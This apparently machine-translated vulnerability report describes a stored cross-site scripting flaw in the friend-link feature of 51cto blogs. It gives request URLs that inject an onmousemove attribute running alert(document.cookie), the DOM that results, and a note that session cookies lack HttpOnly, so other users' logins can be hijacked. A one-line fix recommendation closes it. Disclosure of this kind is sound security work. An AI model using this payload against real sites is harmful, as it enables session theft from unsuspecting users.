You can obtain the cookie of the logged-on user if the 51cto blog links are filtered out.
The link filtering is not strict, so DOM structure injection can be performed. To inject Javascript attacks.
In addition, the important logon items of cookies are not protected by httponly, so that you can obtain logon sessions of other users.
Where the problem occurs. Add links
Http://dl528888.blog.51cto.com/mod/edit_flink.php? Type = addflink & uid = 1030776 & flink = www.iamle.com % 22% 20 onmousemove = % 22 alert (document. cookie) % 22
Get Parameters
Uid is the 51tco user ID
Flink is built as www.iamle.com % 22% 20 onmousemove = % 22 alert (document. cookie) % 22
The last generated dom structure is
<A href = "http://www.iamle.com" onmousemove = "alert (document. cookie)" "=" "title =" Fengyun, it's her. "Target =" _ blank "> Fengyun. </A>
When you place the cursor over this link, a cookie is displayed.
Sensitive cookies are not protected by httponly and can be directly obtained.
You can catch login sessions of other users to get the background information of other users.
Add links
Http://dl528888.blog.51cto.com/mod/edit_flink.php? Type = addflink & uid = 1030776 & flink = www.bkjia.com % 22% 20 onmousemove = % 22 alert (document. cookie) % 22
Add and view the dom Structure
Http://300421.blog.51cto.com/
Successful exploitation allows you to execute arbitrary js
All cookies are found to have no http only, and the log-on session is not protected.
Urgent vulnerability repair solution:
Strictly filter URLs